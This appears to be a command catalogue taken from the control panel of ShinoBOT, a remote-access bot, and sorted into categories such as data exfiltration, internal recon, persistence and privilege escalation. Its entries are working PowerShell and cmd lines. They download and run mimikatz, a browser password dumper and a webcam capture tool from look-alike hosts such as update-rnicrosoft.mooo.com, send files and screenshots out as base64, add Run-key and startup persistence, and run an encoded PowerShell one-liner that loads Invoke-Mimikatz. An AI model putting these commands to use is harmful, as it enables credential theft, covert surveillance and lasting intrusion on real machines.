| ID | NAME |
|---|---|
| CATEGORY | COMMAND |
| CREATED | DESCRIPTION |
| 14 | Download a file |
| Add Weapon | powershell (new-object System.Net.WebClient).DownloadFile('%PARAMETER1%' , '%TEMP%\temp.dat'); |
| 2015-03-23 13:27:29(10y 34w) | Download a file from the specified URL. PARAMETER (Must) -- URL e.g.)http://shinosec.com/ |
| 35 | Download PsExec |
| Add Weapon | powershell (new-object System.Net.WebClient).DownloadFile('http://update-rnicrosoft.mooo.com/files/85df66b931cfbfb0_PsExec.exe','%TEMP%\pse.exe'); dir %TEMP%\pse.exe |
| 2016-08-07 20:53:09(9y 14w) | Download PsExec (v2.11) https://technet.microsoft.com/en-us/sysinternals/psexec.aspx NO PARAMETER |
| 13 | Upload a file |
| Data Exfiltration | powershell [convert]::ToBase64String((Get-Content %PARAMETER1% -Encoding byte)) |
| 2015-03-23 12:45:06(10y 34w) | Upload a client file to this server. PARAMETER (Must) --- File Path e.g.) C:\Users\Administrator\Desktop\secret.doc |
| 20 | Get Domain Admins Name |
| Internal Recon | net group "Domain Admins" /domain |
| 2015-04-03 11:38:57(10y 32w) | Get the domain administrator (member of Domain Admins group). NO PARAMETER |
| 21 | Get Local Administrators Name |
| Internal Recon | net localgroup "Administrators" |
| 2015-04-03 11:41:45(10y 32w) | Get the local administrators account name. |
| 23 | Get the Neighbour IP Address |
| Internal Recon | arp -a |
| 2015-04-04 15:18:31(10y 32w) | Get the neighbour PC's IP Address using the ARP table. NO PARAMETER |
| 26 | Get the Windows Password with Mimikatz |
| Internal Recon | powershell (new-object System.Net.WebClient).DownloadFile('http://shinomal.mooo.com/files/6fdc6cf5e9c53aa2_mimikatz.exe' , '%TEMP%\mimikatz.exe'); %temp%\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit | findstr Password |
| 2015-04-04 15:31:03(10y 32w) | Download mimikatz (http://blog.gentilkiwi.com/mimikatz) and execute it. NO PARAMETER Administrator Rights required. |
| 34 | Steal Browser Password with bpd.exe |
| Internal Recon | powershell (new-object System.Net.WebClient).DownloadFile('http://update-rnicrosoft.mooo.com/files/994b8d282016bc21_BrowserPasswordDump.exe' , '%TEMP%\bpd.exe'); %TEMP%\bpd.exe |
| 2016-08-07 20:32:22(9y 14w) | Steal the password stored by browser. NO PARAMETER |
| 36 | CAPSLOCK Dance |
| Joke | echo Set wshShell =wscript.CreateObject("WScript.Shell") > capslock.vbs echo do >> capslock.vbs echo wscript.sleep 1000 >> capslock.vbs echo wshshell.sendkeys "{CAPSLOCK}" >> capslock.vbs echo loop >> capslock.vbs wscript capslock.vbs |
| 2016-08-11 02:14:28(9y 13w) | Toggle the Capslock key repeatedly. Kill the process wscript.exe to stop this nightmare. Command example) taskkill /F /IM wscript.exe NO PARAMETER |
| 37 | Speech |
| Joke | echo Dim message, sapi > speech.vbs echo message="%PARAMETER1%" >> speech.vbs echo Set sapi=CreateObject("sapi.spvoice") >> speech.vbs echo sapi.Speak message >> speech.vbs wscript speech.vbs |
| 2016-08-11 03:11:19(9y 13w) | Speech the specified text. PARAMETER (Mandantory) The text you want to speech. |
| 38 | Open CD tray |
| Joke | echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) > cdtray.vbs echo Set colCDROMs = oWMP.cdromCollection >> cdtray.vbs echo if colCDROMs.Count >= 1 then >> cdtray.vbs echo do >> cdtray.vbs echo For i = 0 to colCDROMs.Count - 1 >> cdtray.vbs echo colCDROMs.Item(i).Eject >> cdtray.vbs echo Next ' cdrom >> cdtray.vbs echo For i = 0 to colCDROMs.Count - 1 >> cdtray.vbs echo colCDROMs.Item(i).Eject >> cdtray.vbs echo Next ' cdrom >> cdtray.vbs echo loop >> cdtray.vbs echo End If >> cdtray.vbs wscript cdtray.vbs |
| 2016-08-11 07:45:58(9y 13w) | Open the CD tray repeatedly. Kill the process wscript.exe to stop this nightmare. Command example) taskkill /F /IM wscript.exe NO PARAMETER |
| 15 | Free Command |
| Misc | |
| 2015-03-23 14:42:46(10y 34w) | There is no command, so you can use the parameter as the command without having this in the job repository. PARAMETER (Must) --- Command e.g) ipconfig .all |
| 18 | Capture Web Cam |
| Misc | powershell (new-object System.Net.WebClient).DownloadFile('http://shinomal.mooo.com/files/3ebf375ce9a33d41_CommandCam.exe' , '%TEMP%\CommandCam.exe'); %TEMP%\CommandCam.exe /filename %temp%\image.bmp /quiet /delay %PARAMETER1%1 powershell [convert]::ToBase64String((Get-Content %TEMP%\image.bmp -Encoding byte)) |
| 2015-04-03 08:51:49(10y 32w) | Download CommandCam: https://batchloaf.wordpress.com/commandcam/ Execute it to take a picture. Then upload the picture. PARAMETER (Option) -- Delay before taking the photo in centisec. e.g.) 1000 It means 10 seconds. |
| 22 | Auto Start Using Startup Folder |
| Persistence | copy %PARAMETER1% %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ |
| 2015-04-03 16:04:55(10y 32w) | Download the newest ShinoBOT to the startup folder. PARAMETER (Must) -- File name e.g.)ShinoBOT.exe |
| 43 | Auto Start With Run registry |
| Persistence | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v ShinoBOT /d %PARAMETER1% |
| 2016-10-25 08:10:14(9y 2w) | Add a registry key to start ShinoBOT after OS reboot. You have to specify the path of ShinOBOT. If you don't know, use "cd" command to check the current directory. PARAMETER(Must) -- ShinoBOT Path (absolute) e.g.)C:\User\username\ShinoBOT.exe |
| 41 | Run As Administrator |
| Privilege Escalation | powershell Start-Process %PARAMETER1% -Verb RunAs |
| 2016-09-14 05:16:52(9y 8w) | Same as "Run As Administrator". If UAC is enabled, a popup will appear. PARAMETER(Must) -- Executable path e.g.)%TEMP%\ShinoBOT.exe |
| 1 | Get Hostname (Default) |
| System Information | hostname |
| 2015-03-20 09:48:18(10y 34w) | Get host name. |
| 2 | Get User Name / Domain Name (Default) |
| System Information | whoami |
| 2015-03-20 09:53:36(10y 34w) | Get the user name. PARAMETER (Optional) --- parameter of whoami command e.g) /ALL for details /LOGINID for SID /PRIV to enum the user priviledge |
| 3 | Get local IP Address (Default) |
| System Information | ipconfig |
| 2015-03-20 09:56:36(10y 34w) | Get the local IP Address from ipconfig. NO PARAMETER |
| 4 | Get Current Directory (Default) |
| System Information | cd |
| 2015-03-20 09:59:18(10y 34w) | Get current directory. NO PARAMETER |
| 10 | Screenshot (Default) |
| System Information | SBOTshot powershell [convert]::ToBase64String((Get-Content %TEMP%\SBOTshot -Encoding byte)) |
| 2015-03-23 08:49:56(10y 34w) | Take a screen shot. NO PARAMETER. |
| 12 | Get Windows Version (Default) |
| System Information | ver |
| 2015-03-23 09:35:31(10y 34w) | Get the Windows version using command ver. |
| 16 | Get System Info Details (Default) |
| System Information | systeminfo |
| 2015-03-24 01:54:52(10y 34w) | Get the hardware detail, NIC information, hotfix applied. NO PARAMETER |
| 19 | Get Time Zone |
| System Information | tzutil /g |
| 2015-04-03 11:35:40(10y 32w) | Get Time Zone by tzutil command. NO PARAMETER |
| 24 | Get the File List |
| System Information | dir /a:-d /b |
| 2015-04-04 15:21:10(10y 32w) | Get the file list (not directory). PARAMETER -- Folder Path e.g.)C:\Users If no parameter is specified, the current directory will be used. |
| 25 | Get the Folder List |
| System Information | dir /a:d /b |
| 2015-04-04 15:22:35(10y 32w) | Get the folder list (not file). PARAMETER -- Folder Path e.g.)C:\Users If no parameter is specified, the current directory will be used. |
| 33 | Get Proxy Settings |
| System Information | reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer |
| 2015-04-24 05:25:55(10y 29w) | NO PARAMETER |
| 39 | Invoke Mimikatz |
| System Information | powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUwBoADEAbgAwAGcAMQAvAFAAbwBzAHQALQBDAG8AbQBwAHIAbwBtAGkAcwBlAGQALQBUAG8AbwBsAHMALwBtAGEAcwB0AGUAcgAvAGkAbQAuAHAAcwAxACcAKQA7ACAAJABvAHUAdABwAHUAdAA9AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7ACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAG8AdQB0AHAAdQB0AA== |
| 2016-09-12 14:50:50(9y 9w) | Get Windows passwords by Mimikatz injected into memory; no file access. NO PARAMETER *Administration Rights required. |
| 40 | Ask Admin Rights by UAC |
| System Information | powershell Start-Process %PARAMETER1% -Verb runAs |
| 2016-09-12 14:55:15(9y 9w) | Get the Administration Right by UAC. PARAMETER(Must) -- File Path e.g.)C:\temp\ShinoBOT.exe |
| 44 | Check Login User |
| System Information | query user |
| 2016-10-25 08:34:22(9y 2w) | Check the existing user session, login time. NO PARAMETER |